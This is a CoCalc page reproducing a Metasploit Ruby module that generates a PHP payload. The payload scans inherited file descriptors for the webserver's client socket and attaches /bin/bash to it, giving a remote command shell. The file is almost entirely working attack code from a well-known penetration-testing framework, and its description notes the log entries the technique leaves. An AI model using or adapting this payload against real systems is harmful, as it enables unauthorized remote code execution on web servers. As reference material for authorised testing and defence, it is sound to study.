CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/php/shell_findsock.rb
Views: 11766
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6


7
module MetasploitModule

8


9
  CachedSize = :dynamic

10


11
  include Msf::Payload::Single

12
  include Msf::Payload::Php

13
  include Msf::Sessions::CommandShellOptions

14


15
  def initialize(info = {})

16
    super(merge_info(info,

17
      'Name'          => 'PHP Command Shell, Find Sock',

18
      'Description'   => %Q{

19
        Spawn a shell on the established connection to

20
        the webserver.  Unfortunately, this payload

21
        can leave conspicuous evil-looking entries in the

22
        apache error logs, so it is probably a good idea

23
        to use a bind or reverse shell unless firewalls

24
        prevent them from working.  The issue this

25
        payload takes advantage of (CLOEXEC flag not set

26
        on sockets) appears to have been patched on the

27
        Ubuntu version of Apache and may not work on

28
        other Debian-based distributions.  Only tested on

29
        Apache but it might work on other web servers

30
        that leak file descriptors to child processes.

31
        },

32
      'Author'        => [ 'egypt' ],

33
      'License'       => BSD_LICENSE,

34
      'Platform'      => 'php',

35
      'Handler'       => Msf::Handler::FindShell,

36
      'Session'       => Msf::Sessions::CommandShell,

37
      'Arch'          => ARCH_PHP

38
      ))

39
  end

40


41
  def php_findsock

42


43
    var_cmd = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)

44
    var_fd  = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)

45
    var_out = '$' + Rex::Text.rand_text_alpha(rand(4) + 6)

46
    shell = <<END_OF_PHP_CODE

47
#{php_preamble}

48
print("<html><body>");

49
flush();

50


51
function mysystem(#{var_cmd}){

52
  #{php_system_block(cmd_varname: var_cmd, output_varname: var_out)}

53
  return #{var_out};

54
}

55


56
#{var_fd} = 13;

57
for ($i = 3; $i < 50; $i++) {

58
  $foo = mysystem("/bin/bash 2>/dev/null <&$i -c 'echo $i'");

59
  if ($foo != $i) {

60
    #{var_fd} = $i - 1;

61
    break;

62
  }

63
}

64
print("</body></html>\n\n");

65
flush();

66


67
#{var_cmd} = "/bin/bash <&#{var_fd} >&#{var_fd} 2>&#{var_fd}";

68
mysystem(#{var_cmd});

69


70
END_OF_PHP_CODE

71


72


73
    return shell

74
  end

75


76
  #

77
  # Constructs the payload

78
  #

79
  def generate(_opts = {})

80
    return php_findsock

81
  end

82
end

83


84